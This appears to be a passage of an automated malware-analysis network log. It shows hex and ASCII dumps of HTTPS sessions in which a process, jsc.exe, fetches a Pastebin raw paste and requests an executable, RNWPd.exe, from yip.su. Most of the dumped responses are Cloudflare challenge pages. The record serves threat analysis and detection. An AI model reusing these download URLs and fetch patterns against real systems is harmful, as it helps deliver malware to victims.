                                    2024-08-17 22:08:06 UTC679INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 6d 6d 5a 2b 4e 44 4a 6c 50 72 52 48 72 61 67 2f 59 5a 6e 72 44 50 47 62 56 75 49 62 6c 35 4c 30 30 39 77 32 67 4f 62 31 4c 30 32 36 58 52 6b 55 6b 33 74 4f 39 62 64 52 6b 4f 6c 34 76 74 73 46 70 6b 59 68 75 39 4d 31 78 51 4c 70 4a 50 79 4f 55 30 50 41 76 57 6e 61 59 7a 76 4a 76 45 65 34 49 69 72 59 38 4f 69 47 42 62 67 3d 24 63 6c 79 2f 47 55 63 66 4b 39 49 59 63 43 42 58 4d 78 38 37 39 67 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: mmZ+NDJlPrRHrag/YZnrDPGbVuIbl5L009w2gOb1L026XRkUk3tO9bdRkOl4vtsFpkYhu9M1xQLpJPyOU0PAvWnaYzvJvEe4IirY8OiGBbg=$cly/GUcfK9IYcCBXMx879g==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:06 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:06 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:06 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:06 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:06 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:06 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:06 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:06 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 33 33 38 34 31 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 62 31 35 37 38 62 66 34 32 39 39 27 2c 63 48 61 73 68 3a 20 27 36 61 64 37 64 31 32 36 32 62 62 34 31 34 34 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 6b 64 31 78 46 4b 4e 4b 79 62 5a 5f 31 66 6e 65 75 65 52 37 39 6b 44 30 55 53 39 4d 6c 76 6f 6d 52 36 41 77 61 50 77 33 38 46 67 2d 31 37 32 33 39 33 32 34 38 35 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '33841',cRay: '8b4cfb1578bf4299',cHash: '6ad7d1262bb4144',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=kd1xFKNKybZ_1fneueR79kD0US9MlvomR6AwaPw38Fg-1723932485-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:08:06 UTC1369INData Raw: 38 79 6c 4f 41 47 76 6d 46 4b 6c 5a 5a 46 70 33 6b 31 5a 78 2e 56 71 4b 38 51 57 5a 52 78 68 68 42 6d 36 37 49 5f 39 69 49 54 62 38 36 47 4d 4b 6a 6e 77 47 52 69 51 50 42 6c 49 4c 4e 69 42 59 30 52 51 35 4a 7a 4c 6b 52 47 64 42 61 6c 66 61 44 45 6c 34 74 62 4f 54 57 67 55 34 32 49 6a 4d 4b 36 34 36 6e 61 39 52 74 4e 51 45 31 4f 71 4c 67 2e 77 38 64 4b 67 41 46 5a 35 58 72 58 69 47 41 53 62 68 4e 61 73 57 34 6e 50 51 56 68 73 76 45 42 65 75 2e 72 76 5f 4d 58 54 77 4d 76 42 43 51 6b 63 78 46 30 4e 62 4b 69 5f 2e 33 6f 56 4f 38 50 2e 79 4e 43 34 4f 58 44 6d 55 45 6f 71 4f 7a 48 51 39 50 6b 6d 36 45 35 33 32 6d 31 48 37 65 67 70 59 75 73 46 31 74 35 6f 46 7a 4e 2e 50 4b 39 34 75 65 61 4f 46 4f 76 4f 2e 37 51 6d 75 2e 76 65 4c 66 69 77 49 45 77 30 6b 41 37 6e
                                    Data Ascii: 8ylOAGvmFKlZZFp3k1Zx.VqK8QWZRxhhBm67I_9iITb86GMKjnwGRiQPBlILNiBY0RQ5JzLkRGdBalfaDEl4tbOTWgU42IjMK646na9RtNQE1OqLg.w8dKgAFZ5XrXiGASbhNasW4nPQVhsvEBeu.rv_MXTwMvBCQkcxF0NbKi_.3oVO8P.yNC4OXDmUEoqOzHQ9Pkm6E532m1H7egpYusF1t5oFzN.PK94ueaOFOvO.7Qmu.veLfiwIEw0kA7n


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    2192.168.2.549714104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:11 UTC50OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    2024-08-17 22:08:11 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfb354d5432d3-EWR
                                    2024-08-17 22:08:11 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:11 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:11 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:11 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    3192.168.2.549715188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:11 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:11 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:11 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:11 UTC689INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 68 54 49 57 2f 59 4f 4f 6d 79 4d 4c 49 33 66 6c 58 2b 47 2b 4e 6a 31 62 6d 32 4f 6a 68 4f 65 47 51 66 47 31 59 63 5a 51 43 4f 36 4c 74 30 77 71 33 52 6c 78 32 62 46 78 53 41 4f 77 4b 74 4f 33 42 36 59 32 59 42 52 67 47 61 4b 76 6c 64 45 74 2f 74 79 78 76 36 37 36 34 79 72 49 58 5a 55 64 4d 31 41 37 6f 30 67 49 47 75 49 3d 24 76 69 51 74 30 45 4c 71 5a 77 4f 30 47 69 4e 49 2f 4b 36 47 52 51 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: hTIW/YOOmyMLI3flX+G+Nj1bm2OjhOeGQfG1YcZQCO6Lt0wq3Rlx2bFxSAOwKtO3B6Y2YBRgGaKvldEt/tyxv6764yrIXZUdM1A7o0gIGuI=$viQt0ELqZwO0GiNI/K6GRQ==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:11 UTC1369INData Raw: 33 64 66 63 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3dfc<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:11 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
